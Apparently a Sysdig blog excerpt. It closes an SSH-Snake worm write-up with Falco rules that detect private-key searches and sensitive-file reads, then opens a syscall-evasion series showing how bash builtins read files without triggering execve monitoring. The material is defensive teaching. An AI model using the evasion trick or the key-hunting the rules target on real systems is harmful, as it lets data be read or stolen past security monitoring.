Filenames found on the C2 server contain IP addresses of victims, which allowed us to make a high confidence assessment that these threat actors are actively exploiting known Confluence vulnerabilities in order to gain initial access and deploy SSH-Snake. This does not preclude other exploits from being used, but many of the victims are running Confluence.  

Output of SSH-Snake contains the credentials found, the IPs of the targets, and the bash history of the victims. We are witnessing the victim list growing, which means that this is an ongoing operation. At the time of writing, the number of victims is approximately 100.

Detecting SSH-Snake with Falco

Falco, an incubating project under the CNCF, provides real-time detection alerts of unusual activities in cloud-native environments. Users have the option to implement the default Falco rules within Falco or create their own custom rules using its straightforward and adaptable language.

Falco can detect the use of SSH-Snake at runtime using its default rules, and you can also modify them or craft new ones if you want to improve the detection. The default Falco rules that trigger when SSH-Snake is run are:

- rule: Disallowed SSH connection
  desc: Detect any new SSH connection on port 22 to a host other than those in an allowed list of hosts. This rule absolutely requires profiling your environment beforehand.
  condition: >
    inbound_outbound
    and ssh_port
    and not allowed_ssh_hosts
  output: Disallowed SSH Connection (connection=%fd.name lport=%fd.lport rport=%fd.rport fd_type=%fd.type fd_proto=%fd.l4proto evt_type=%evt.type user=%user.name user_uid=%user.uid user_loginuid=%user.loginuid process=%proc.name proc_exepath=%proc.exepath parent=%proc.pname command=%proc.cmdline terminal=%proc.tty %container.info)
  priority: NOTICE

Availability: Falco OSS, Sysdig Rule Library

- rule: Read sensitive file trusted after startup
  condition: > 
    open_read 
    and sensitive_files 
    and server_procs 
    and not proc_is_new 
    and proc.name!="sshd" 
    and not user_known_read_sensitive_files_activities
  output: Sensitive file opened for reading by trusted program after startup (file=%fd.name pcmdline=%proc.pcmdline gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4] evt_type=%evt.type user=%user.name user_uid=%user.uid user_loginuid=%user.loginuid process=%proc.name proc_exepath=%proc.exepath parent=%proc.pname command=%proc.cmdline terminal=%proc.tty %container.info)
  priority: WARNING

Availability: Falco OSS, Sysdig Runtime Notable Events (Sysdig Secure Policy)

- rule: System user interactive
  condition: > 
    spawned_process 
    and system_users 
    and interactive 
    and not user_known_system_user_login
  output: System user ran an interactive command (evt_type=%evt.type user=%user.name user_uid=%user.uid user_loginuid=%user.loginuid process=%proc.name proc_exepath=%proc.exepath parent=%proc.pname command=%proc.cmdline terminal=%proc.tty exe_flags=%evt.arg.flags %container.info)
  priority: INFO

Availability: Falco OSS, Sysdig Runtime Notable Events (Sysdig Secure Policy)

- rule: Search Private Keys or Passwords
  condition: >
    (spawned_process and
    ((grep_commands and private_key_or_password) or
    (proc.name = "find" and (proc.args contains "id_rsa" or proc.args contains "id_dsa" or proc.args contains "id_ed25519" or proc.args contains "id_ecdsa" or (services_credentials_files)))))
  output: Grep private keys or passwords activities detected on %container.name with cmdline %proc.cmdline and parent %proc.pname under user %user.name
  priority: WARNING

Availability: Falco OSS, Sysdig Runtime Threat Detection (Sysdig Secure Policy)

Conclusion

SSH-Snake is an evolutionary step in the malware commonly deployed by threat actors. It is smarter and more reliable, which will allow threat actors to reach farther into a network once they gain a foothold. The use of SSH keys is a recommended practice that SSH-Snake tries to take advantage of in order to spread. It is also fileless, which can make static detection difficult.

That’s why runtime solutions, such as Sysdig Secure and Falco, are necessary. Detecting attacks as soon as they happen allows you to speed up the investigation process and will keep your exposure to a minimum.

The post SSH-Snake: New Self-Modifying Worm Threatens Networks appeared first on Sysdig.

Exploring Syscall Evasion – Linux Shell Built-ins | https://sysdig.com/blog/exploring-syscall-evasion/ | Wed, 14 Feb 2024 15:15:00 +0000

This is the first article in a series focusing on syscall evasion as a means to work around detection by security tools and what we can do to combat such efforts. We’ll be starting out the series discussing how this applies to Linux operating systems, but this is a technique that applies to Windows as well, and we’ll touch on some of this later on in the series. 

In this particular installment, we’ll be discussing syscall evasion with bash shell builtins. If you read that and thought “what evasion with bash what now?”, that’s ok. We’ll walk through it from the beginning. 

What is a Syscall?

System calls, commonly referred to as syscalls, are the interface between user-space applications and the kernel, which, in turn, talks to the rest of our resources, including files, networks, and hardware. Basically, we can consider syscalls to be the gatekeepers of the kernel when we’re looking at things from a security perspective.

Many security tools (Falco included) that watch for malicious activity taking place are monitoring syscalls going by. This seems like a reasonable approach, right? If syscalls are the gatekeepers of the kernel and we watch the syscalls with our security tool, we should be able to see all of the activity taking place on the system. We’ll just watch for the bad guys doing bad things with bad syscalls and then we’ll catch them, right? Sadly, no.

There is a dizzying array of syscalls, some of which have overlapping sets of functionality. For instance, if we want to open a file, there is a syscall called open() and we can look at the documentation for it here. So if we have a security tool that can watch syscalls going by, we can just watch for the open() syscall and we should be all good for monitoring applications trying to open files, right? Well, sort of.

A look at the synopsis in the open() documentation reveals the problem.

As it turns out, there are several syscalls that we could be using to open our file: open(), creat(), openat(), and openat2(), each of which have a somewhat different set of behaviors. For example, the main difference between open() and openat() is that the path for the file being opened by openat() is considered to be relative to the current working directory, unless an absolute path is specified. Depending on the operating system being used, the application in question, and what it is doing relative to the file, we may see different variations of the open syscalls taking place. If we’re only watching open(), we may not see the activity that we’re looking for at all.

Generally, security tools watch for the execve() syscall, which is one syscall indicating process execution taking place (there are others of a similar nature such as execveat(), clone(), and fork()). This is a safer thing to watch from a resource perspective, as it doesn’t take place as often as some of the other syscalls. This is also where most of the interesting activity is taking place. Many of the EDR-like tools watch this syscall specifically. As we’ll see here shortly, this is not always the best approach. 

There aren’t any inherently bad syscalls we can watch; they’re all just tools. Syscalls don’t hack systems, people with syscalls hack systems. There are many syscalls to watch and a lot of different ways they can be used. On Linux, one of the common methods of interfacing with the OS is through system shells, such as bash and zsh.
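This is exactly what makes shell builtins interesting for evasion: a builtin executes inside the already-running shell process, so no new execve() is issued for it, while an external binary is spawned as a new process. The shell’s own `type` command shows which names are builtins:

```shell
# A builtin runs inside the shell itself: no execve() for a monitor to observe
type echo

# An external binary typically spawns a new process, which does trigger execve()
type ls
```

Tools that key only on execve() will therefore see the `ls` but can miss work done entirely with builtins, a theme the rest of this series explores.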

NOTE: If you want to see a complete* list of syscalls, take a gander at the syscalls man page here. This list also shows where syscalls are specific to certain architectures or have been deprecated. (*for certain values of complete)

Examining Syscalls

Now that we have some ideas of what syscalls are, let’s take a quick look at some of them in action. On Linux, one of the primary tools for examining syscalls as they happen is strace. There are a few other tools we can use for this (including the open source version of Sysdig), which we will discuss at greater length in future articles. The strace utility allows us to snoop on syscalls as they’re taking place, which is exactly what we want when we’re trying to get a better view of what exactly is happening when a command executes. Let’s try this out:

1 – We’re going to make a new directory to perform our test in, then use touch to make a file in it. This will help minimize what we get back from strace, but it will still return quite a bit.

5 – Then, we’ll run strace and ask it to execute the ls command. Bear in mind that this is the output of a very small and strictly bounded test where we aren’t doing much. With a more complex set of commands, we would see many, many more syscalls. 

7 – Here, we can see the execve() syscall and the ls command being executed. This particular syscall is often the one monitored for by various detection tools, as it indicates program execution. Note that there are a lot of other syscalls happening in our example, but only one execve().

8 – From here on down, we can see a variety of syscalls taking place in order to support the ls command being executed. We won’t dig too deeply into the output here, but we can see various libraries being used, address space being mapped, bytes being read and written, etc.

$ mkdir test
$ cd test/
$ touch testfile

$ strace ls

execve("/usr/bin/ls", ["ls"], 0x7ffcb7920d30 /* 54 vars */) = 0
brk(NULL)                               = 0x5650f69b7000
arch_prctl(0x3001 /* ARCH_??? */, 0x7fff2e5ae540) = -1 EINVAL (Invalid argument)
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f07f9f63000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=61191, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 61191, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f07f9f54000
close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libselinux.so.1", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=166280, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 177672, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f07f9f28000
mprotect(0x7f07f9f2e000, 139264, PROT_NONE) = 0
mmap(0x7f07f9f2e000, 106496, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x6000) = 0x7f07f9f2e000
mmap(0x7f07f9f48000, 28672, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x20000) = 0x7f07f9f48000
mmap(0x7f07f9f50000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x27000) = 0x7f07f9f50000
mmap(0x7f07f9f52000, 5640, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f07f9f52000
close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0P\237\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
pread64(3, "\4\0\0\0 \0\0\0\5\0\0\0GNU\0\2\0\0\300\4\0\0\0\3\0\0\0\0\0\0\0"..., 48, 848) = 48
pread64(3, "\4\0\0\0\24\0\0\0\3\0\0\0GNU\0 =\340\2563\265?\356\25x\261\27\313A#\350"..., 68, 896) = 68
newfstatat(3, "", {st_mode=S_IFREG|0755, st_size=2216304, ...}, AT_EMPTY_PATH) = 0
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
mmap(NULL, 2260560, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f07f9c00000
mmap(0x7f07f9c28000, 1658880, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x28000) = 0x7f07f9c28000
mmap(0x7f07f9dbd000, 360448, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1bd000) = 0x7f07f9dbd000
mmap(0x7f07f9e15000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x214000) = 0x7f07f9e15000
mmap(0x7f07f9e1b000, 52816, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f07f9e1b000
close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libpcre2-8.so.0", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=613064, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 615184, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f07f9e91000
mmap(0x7f07f9e93000, 438272, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7f07f9e93000
mmap(0x7f07f9efe000, 163840, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x6d000) = 0x7f07f9efe000
mmap(0x7f07f9f26000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x94000) = 0x7f07f9f26000
close(3)                                = 0
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f07f9e8e000
arch_prctl(ARCH_SET_FS, 0x7f07f9e8e800) = 0
set_tid_address(0x7f07f9e8ead0)         = 877628
set_robust_list(0x7f07f9e8eae0, 24)     = 0
rseq(0x7f07f9e8f1a0, 0x20, 0, 0x53053053) = 0
mprotect(0x7f07f9e15000, 16384, PROT_READ) = 0
mprotect(0x7f07f9f26000, 4096, PROT_READ) = 0
mprotect(0x7f07f9f50000, 4096, PROT_READ) = 0
mprotect(0x5650f62f3000, 4096, PROT_READ) = 0
mprotect(0x7f07f9f9d000, 8192, PROT_READ) = 0
prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0
munmap(0x7f07f9f54000, 61191)           = 0
statfs("/sys/fs/selinux", 0x7fff2e5ae580) = -1 ENOENT (No such file or directory)
statfs("/selinux", 0x7fff2e5ae580)      = -1 ENOENT (No such file or directory)
getrandom("\x9a\x10\x6f\x3b\x21\xc0\xe9\x56", 8, GRND_NONBLOCK) = 8
brk(NULL)                               = 0x5650f69b7000
brk(0x5650f69d8000)                     = 0x5650f69d8000
openat(AT_FDCWD, "/proc/filesystems", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0444, st_size=0, ...}, AT_EMPTY_PATH) = 0
read(3, "nodev\tsysfs\nnodev\ttmpfs\nnodev\tbd"..., 1024) = 421
read(3, "", 1024)                       = 0
close(3)                                = 0
access("/etc/selinux/config", F_OK)     = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/usr/lib/locale/locale-archive", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=5712208, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 5712208, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f07f9600000
close(3)                                = 0
ioctl(1, TCGETS, {B38400 opost isig icanon echo ...}) = 0
ioctl(1, TIOCGWINSZ, {ws_row=48, ws_col=143, ws_xpixel=0, ws_ypixel=0}) = 0
openat(AT_FDCWD, ".", O_RDONLY|O_NONBLOCK|O_CLOEXEC|O_DIRECTORY) = 3
newfstatat(3, "", {st_mode=S_IFDIR|0775, st_size=4096, ...}, AT_EMPTY_PATH) = 0
getdents64(3, 0x5650f69bd9f0 /* 3 entries */, 32768) = 80
getdents64(3, 0x5650f69bd9f0 /* 0 entries */, 32768) = 0
close(3)                                = 0
newfstatat(1, "", {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0x2), ...}, AT_EMPTY_PATH) = 0
write(1, "testfile\n", 9testfile
)               = 9
close(1)                                = 0
close(2)                                = 0
exit_group(0)                           = ?
+++ exited with 0 +++


Strace has a considerably larger set of capabilities than what we touched on here. A good starting place for digging into it further is the strace documentation.

Now that we’ve covered syscalls, let’s talk a bit about system shells. 

Linux System Shell 101

System shells are interfaces that allow us to interact with an operating system. While shells can be graphical in nature, most of the time when we hear the word shell, it will be in reference to a command-line shell accessed through a terminal application. The shell interprets commands from the user and passes them onto the kernel via, you guessed it, syscalls. We can use the shell to interact with the resources we discussed earlier as being available via syscalls, such as networks, files, and hardware components. 

On any given Linux installation, there will be one or more shells installed. On a typical server or desktop installation, we’ll likely find a small handful of them installed by default. On a purposefully stripped-down distribution, such as those used for containers, there may only be one. 

On most distributions, we can easily ask about the shell environment that we are operating in: 

1 – Reading /etc/shells should get us a list of which shells are installed on the system. Here we can see sh, bash, rbash, dash, and zsh as available shells. 

NOTE: The contents of /etc/shells isn’t, in all cases, the complete list of shells on the system. It’s a list of which ones can be used as login shells. These are generally the same list, but YMMV.

15 – We can easily check which shell we’re currently using by executing echo $0. In this case, we’re running the bash shell.

19 – Switching to another shell is simple enough. We can see that zsh is present in our list of shells and we can change to it by simply issuing zsh from our current shell. 

21 – Once in zsh, we’ll ask which shell we are in again, and we can see it is now zsh.

25 – We’ll then exit zsh, which will land us back in our previous shell. If we check which shell we’re in again, we can see it is bash once again. 

$ cat /etc/shells

# /etc/shells: valid login shells
/bin/sh
/bin/bash
/usr/bin/bash
/bin/rbash
/usr/bin/rbash
/usr/bin/sh
/bin/dash
/usr/bin/dash
/bin/zsh
/usr/bin/zsh

$ echo $0

/bin/bash

$ zsh

% echo $0

zsh

% exit

$ echo $0

/bin/bash

As we walk through the rest of our discussion, we’ll be focusing on the bash shell. The various shells have somewhat differing functionality, but are usually similar, at least in broad strokes. Bash stands for “Bourne Again SHell,” as it was designed as a replacement for the original Bourne shell. We’ll often find the Bourne shell on many systems as well; it’s in the list we looked at above at /bin/sh.

All this is great, you might say, but we were promised syscall evasion. Hold tight, we have one more background bit to cover, then we’ll talk about those parts. 

Shell Builtins vs. External Binaries

When we execute a command in a shell, it can fall into one of several categories:

  • It can be a program binary external to our shell (we’ll call it a binary for short). 
  • It can be an alias, which is a sort of macro pointing to another command or commands. 
  • It can be a function, which is a user defined script or sequence of commands. 
  • It can be a keyword, a common example of which would be something like ‘if’ which we might use when writing a script. 
  • It can be a shell builtin, which is, as we might expect, a command built into the shell itself. 

We’ll focus primarily on binaries and builtins here. 
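Bash’s type builtin can report which of these categories a given name falls into. Here’s a quick sketch of a session (the ll alias and greet function are throwaways invented for the example):

```shell
type -t ls               # "file" -- an external binary (or "alias", if one is defined)
type -t cd               # "builtin"
type -t if               # "keyword"
alias ll='ls -l'         # define a throwaway alias...
type -t ll               # ..."alias"
greet() { echo "hi"; }   # define a throwaway function...
type -t greet            # ..."function"
```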

Identifying External Binaries

Let’s take another look at the ls command:

1 – We can use the which command to see the location of the command being executed when we run ls. We’ll use the -a switch so it will return all of the results. We can see there are a couple of results, but this doesn’t tell us what ls is, just where it is.

6 – To get a better idea of what is on the other end of ls when we run it, we can use the type command. Again, we’ll add the -a switch to get all the results. Here, we can see that there is one alias and two files in the filesystem behind the ls command.

7 – First, the alias will be evaluated. This particular alias adds the switch to colorize the output of ls when we execute it. 

8 – After this, there are two ls binaries in the filesystem. Which of these is executed depends on the order of our PATH. 

11 – If we take a look at the PATH, we can see that /usr/bin appears in it before /bin, so /usr/bin/ls is the command being executed by the ls alias when we type ls into our shell. The final piece of information we need to know here is what type of command this particular ls is.

15 – We can use the file command to dig into ls. File tells us that this particular version of ls is a 64-bit ELF binary. Circling all the way back around to our discussion on types of commands, this makes ls an external binary. 

21 – Incidentally, if we look at the other ls located in /bin, we will find that it is an identical file with an identical hash. What is this sorcery? If we use file to interrogate /bin, we’ll see that it’s a symlink to usr/bin. We’re seeing the ls binary twice, but there is really only one copy of the file. 

$ which -a ls
/usr/bin/ls
/bin/ls


$ type -a ls
ls is aliased to `ls --color=auto'
ls is /usr/bin/ls
ls is /bin/ls

$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/snap/bin

$ file /usr/bin/ls
/usr/bin/ls: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically
 linked, interpreter /lib64/ld-linux-x86-64.so.2,
 BuildID[sha1]=897f49cafa98c11d63e619e7e40352f855249c13, for GNU/Linux 3.2.0,
 stripped

$ file /bin
/bin: symbolic link to usr/bin
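We can confirm that aliasing at the filesystem level. A quick check, assuming the merged-/usr layout shown above:

```shell
readlink /bin                    # prints "usr/bin" on merged-/usr systems
# test's -ef operator is true when both paths resolve to the same device and inode:
[ /bin/ls -ef /usr/bin/ls ] && echo "one file, two paths"
```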

Identifying Shell Builtins

We briefly mentioned that a shell builtin is built into the binary of the shell itself. The builtins available for any given shell can vary quite widely. Let’s take a quick look at what we have available in bash:

1 – The compgen command is one of those esoteric command line kung-fu bits. In this case, we’ll use it with the -b switch, which effectively says “show me all the shell builtins.” We’ll also do a little formatting to show the output in columns and then show a count of the results.

2 – We can see some common commands in the output, like cd, echo, and pwd (also note the compgen command we just ran). When we execute these, we don’t reach out to any other binaries inside the filesystem, we do it all inside of the bash shell already running. 

17 – We should also note that a command appearing in our shell’s builtins list doesn’t mean it exists only there. If we use the type command again to inquire about echo, which is in our builtins list, type will tell us it is a shell builtin, but we will also see binaries sitting in the filesystem. If we run echo from bash, we will get the builtin; if we run it from another shell without a builtin echo, we may get the one from the filesystem instead. 

$ compgen -b | pr -5 -t; echo "Count: $(compgen -b | wc -l)"
.         compopt    fc         popd       suspend
:         continue   fg         printf     test
[         declare    getopts    pushd      times
alias     dirs       hash       pwd        trap
bg        disown     help       read       true
bind      echo       history    readarray  type
break     enable     jobs       readonly   typeset
builtin   eval       kill       return     ulimit
caller    exec       let        set        umask
cd        exit       local      shift      unalias
command   export     logout     shopt      unset
compgen   false      mapfile    source     wait
complete
Count: 61

$ type -a echo
echo is a shell builtin
echo is /usr/bin/echo
echo is /bin/echo
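Bash also gives us explicit control over which echo we get. A short sketch:

```shell
builtin echo "always the builtin"   # force the builtin version
/usr/bin/echo "always the binary"   # a full path skips the builtin entirely
enable -n echo                      # disable the builtin in this shell...
type -t echo                        # ...so echo now resolves to "file"
enable echo                         # turn the builtin back on
type -t echo                        # "builtin" again
```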


It’s also important to note that this set of builtins is specific to the bash shell, and other shells may be very different. Let’s take a quick look at the builtins for zsh.

1 – Zsh doesn’t have compgen, so we’ll need to get the data we want in a different manner. We’ll access the builtins associative array, which contains all the builtin commands of zsh, then do some formatting to make the results a bit more sane and put the output into columns, lastly getting a count of the results.

% print -roC5 -- ${(k)builtins}; echo "Count: ${(k)#builtins}"

-               compquote     fg          pushln     umask
.               compset       float       pwd        unalias
:               comptags      functions   r          unfunction
[               comptry       getln       read       unhash
alias           compvalues    getopts     readonly   unlimit
autoload        continue      hash        rehash     unset
bg              declare       history     return     unsetopt
bindkey         dirs          integer     sched      vared
break           disable       jobs        set        wait
builtin         disown        kill        setopt     whence
bye             echo          let         shift      where
cd              echotc        limit       source     which
chdir           echoti        local       suspend    zcompile
command         emulate       log         test       zf_ln
compadd         enable        logout      times      zformat
comparguments   eval          noglob      trap       zle
compcall        exec          popd        true       zmodload
compctl         exit          print       ttyctl     zparseopts
compdescribe    export        printf      type       zregexparse
compfiles       false         private     typeset    zstat
compgroups      fc            pushd       ulimit     zstyle
Count: 105
NOTE:
Print what now? print -roC5 -- ${(k)builtins}; echo "Count: ${(k)#builtins}" can be a bit difficult to parse. Here’s a breakdown of what each part does:
%: The zsh prompt; it indicates which shell we’re (probably) in and isn’t part of the command.
print: A zsh command used to display text.
-roC5: Options for the print command.
  -r: Don’t treat backslashes as escape characters.
  -o: Sort the printed list in alphabetical order.
  -C5: Format the output into 5 columns.
--: Signifies the end of the options for the command. Anything after this is treated as an argument, not an option.
${(k)builtins}: A parameter expansion in zsh.
  ${...}: Parameter expansion syntax.
  (k): A flag to list the keys of an associative array.
  builtins: The associative array in zsh that contains all of its builtin commands.
echo "Count: ${(k)#builtins}": Prints the count of builtin commands.
  ${(k)#builtins}: Counts the number of keys in the builtins associative array, which here means counting all of zsh’s builtin commands.
In simple terms, this command lists all the builtin commands available in the zsh shell, formats them into five columns, and then displays the total count of these commands.

We can see here that there are over 40 more builtins in zsh than there are in bash. Many of them are the same as what we see in bash, but the availability of builtin commands is something to validate when working with different shells. We’ll continue working with bash as it’s one of the more commonly used shells that we might encounter, but this is certainly worth bearing in mind. 
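When scripting across shells, it can be worth verifying that a builtin exists before relying on it. A hypothetical bash helper (the is_builtin name is ours):

```shell
# Returns success only if the name resolves to a builtin in this bash shell.
is_builtin() {
  [ "$(type -t "$1" 2>/dev/null)" = "builtin" ]
}

is_builtin mapfile && echo "mapfile is available as a builtin"
is_builtin bindkey || echo "bindkey is zsh-only; find another way"
```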

Now that we know a bit about the shell and shell builtins, let’s look at how we can use these for syscall evasion.

Syscall Evasion Techniques Using Bash Builtins

As we mentioned earlier, many security tools that monitor syscalls monitor for process execution via the execve() syscall. From a certain tool design perspective, this is a great solution as it limits the number of syscalls we need to watch and should catch most of the interesting things going on. For example, let’s use cat to read out the contents of a file and watch what happens with strace:

1 – First, we’ll echo a bit of data into the test file we used earlier so we have something to play with. Then, we’ll cat the file and we can see the output with the file contents.

5 – Now let’s do this again, but this time we’ll watch what happens with strace. We’ll spin up a new bash shell which we will monitor with strace. This time, we’ll also add the -f switch so strace will monitor subprocesses as well. This will result in a bit of extra noise in the output, but we need this in order to get a better view of what is happening as we’re operating in a new shell. Note that strace is now specifying the pid (process id) at the beginning of each syscall as we’re watching multiple processes.

6 – Here we have the execve() syscall taking place for the bash shell we just started. We can see the different subprocesses taking place as bash starts up.

34 – Now we’re dropped back to a prompt, but still operating inside the shell being monitored with strace. Let’s cat the file again and watch the output. 

37 – We can see the syscall for our cat here, along with the results of the command. This is all great, right? We were able to monitor the command with strace and see its execution. We saw the exact command we ran and the output of the command. 

$ echo supersecretdata >> testfile
$ cat testfile 
supersecretdata

$ strace -f -e trace=execve bash
execve("/usr/bin/bash", ["bash"], 0x7ffee6b6c710 /* 54 vars */) = 0
strace: Process 884939 attached
[pid 884939] execve("/usr/bin/lesspipe", ["lesspipe"], 0x55aa1d8a3090 /* 54 vars */) = 0
strace: Process 884940 attached
[pid 884940] execve("/usr/bin/basename", ["basename", "/usr/bin/lesspipe"],
0x55983907af68 /* 54 vars */) = 0
[pid 884940] +++ exited with 0 +++
[pid 884939] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED,
 si_pid=884940, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
strace: Process 884941 attached
strace: Process 884942 attached
[pid 884942] execve("/usr/bin/dirname", ["dirname", "/usr/bin/lesspipe"],
0x559839087108 /* 54 vars */) = 0
[pid 884942] +++ exited with 0 +++
[pid 884941] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=884942, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
[pid 884941] +++ exited with 0 +++
[pid 884939] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=884941, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
[pid 884939] +++ exited with 0 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=884939,
si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
strace: Process 884943 attached
[pid 884943] execve("/usr/bin/dircolors", ["dircolors", "-b"], 0x55aa1d8a2d10 /* 54 vars
*/) = 0
[pid 884943] +++ exited with 0 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=884943,
si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
$ cat testfile

strace: Process 884946 attached
[pid 884946] execve("/usr/bin/cat", ["cat", "testfile"], 0x55aa1d8a9520 /* 54 vars */) = 0
supersecretdata
[pid 884946] +++ exited with 0 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=884946,
si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---

$ exit
exit
+++ exited with 0 +++


Let’s try being sneakier about things by using a little shell scripting of a bash builtin and see what the results are: 

1 – We’ll start a new bash shell and watch it with strace, the same as we did previously.

3 – Here’s the execve() syscall for the bash shell, just as we expected.

31 – And we’re dropped back to the prompt. This time, instead of using cat, we’ll use two of the bash builtins to frankenstein a command together and replicate what cat does:

while IFS= read -r line; do echo "$line"; done < testfile

This uses the bash builtins read and echo to process our file line by line. We use read to fetch each line from testfile into the variable line, with the -r switch to ensure any backslashes are read literally. The IFS= (internal field separator) preserves leading and trailing whitespaces. Then, echo outputs each line exactly as it’s read.

35 – Zounds! We’re dropped back to the prompt with no output from strace at all.

$ strace -f -e trace=execve bash

execve("/usr/bin/bash", ["bash"], 0x7fff866fefc0 /* 54 vars */) = 0
strace: Process 884993 attached
[pid 884993] execve("/usr/bin/lesspipe", ["lesspipe"], 0x5620a56bf090 /* 54 vars */) = 0
strace: Process 884994 attached
[pid 884994] execve("/usr/bin/basename", ["basename", "/usr/bin/lesspipe"],
0x558950f6cf68 /* 54 vars */) = 0
[pid 884994] +++ exited with 0 +++
[pid 884993] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED,
si_pid=884994, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
strace: Process 884995 attached
strace: Process 884996 attached
[pid 884996] execve("/usr/bin/dirname", ["dirname", "/usr/bin/lesspipe"],
0x558950f79108 /* 54 vars */) = 0
[pid 884996] +++ exited with 0 +++
[pid 884995] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED,
si_pid=884996, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
[pid 884995] +++ exited with 0 +++
[pid 884993] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED,
si_pid=884995, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
[pid 884993] +++ exited with 0 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=884993,
si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
strace: Process 884997 attached
[pid 884997] execve("/usr/bin/dircolors", ["dircolors", "-b"], 0x5620a56bed10 /* 54 vars
*/) = 0
[pid 884997] +++ exited with 0 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=884997,
si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
$ while IFS= read -r line; do echo "$line"; done < testfile

supersecretdata

$ 
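Incidentally, read and echo aren’t the only builtins that can stand in for cat here. A variant sketch using mapfile, which likewise never leaves the shell process (assuming the same testfile from earlier):

```shell
# Slurp the whole file into an array with the mapfile builtin (still no
# execve() for an external binary), then print it with the printf builtin.
mapfile -t lines < testfile
printf '%s\n' "${lines[@]}"
```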

If we can’t see the activity while monitoring for process execution, how do we find it?

